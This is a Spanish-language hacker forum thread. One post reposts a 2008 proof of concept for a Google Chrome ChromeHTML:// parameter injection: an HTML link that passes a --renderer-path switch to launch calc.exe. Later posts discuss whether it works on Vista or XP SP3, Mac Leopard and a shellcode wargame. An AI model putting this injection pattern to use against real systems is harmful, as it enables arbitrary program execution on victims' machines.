La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop .
Google Chrome Browser (ChromeHTML://) Remote Parameter Injection fuente: http://www.milw0rm.com
Código:
<!-- Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html
click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>
No rula en: Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC
Me da miedo cambiar a Leopard XDD, estoy contento con mi kernel Darwin 10.5.6, alguna page de las mejoras de Leopard, quien ya lo ha instalado que comente su experiencia tengo una MAC book intel
No encontre la documentacion de blackngel, deberia estar el Link donde lo mencionas sirdarckcat.
PD: Divertido el wargame, con difucultades , se que a muchos no les gusta la explotacion de binarios, pero vaya, con el curro y ademas tener que dormir para llegar a la officina es algo pesado, y cuando uno se queria conectar de madruga el wargame estaba down!
FELICIDADES!!! a los ganadores y participantes de este wargame!
Con las caidas del server, con el SSH que jamas logre conectar dede consola, el VT100 que no funcionaba correctamente, el shellcode FreeBSD que tuvimos que currarnos XDD en fin muchas cosas...